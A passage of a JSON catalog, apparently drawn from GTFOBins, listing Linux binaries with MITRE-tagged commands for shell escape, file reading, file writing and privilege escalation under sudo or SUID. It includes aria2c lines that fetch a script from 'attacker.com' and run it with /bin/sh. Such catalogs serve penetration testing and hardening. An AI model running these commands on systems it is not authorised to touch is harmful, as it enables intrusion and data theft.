http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:sudo","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:suid","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:unprivileged","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:sudo","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:suid","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:unprivileged","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:sudo","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:suid","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:unprivileged","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii85:file-read:0:sudo","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii85/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii85:file-read:0:unprivileged","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii85/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:sudo","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:suid","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:unprivileged","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:command:0:sudo","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:command:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:shell:0:sudo","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:shell:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:sudo","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:suid","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:unprivileged","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoconf:shell:0:sudo","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoconf:shell:0:unprivileged","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 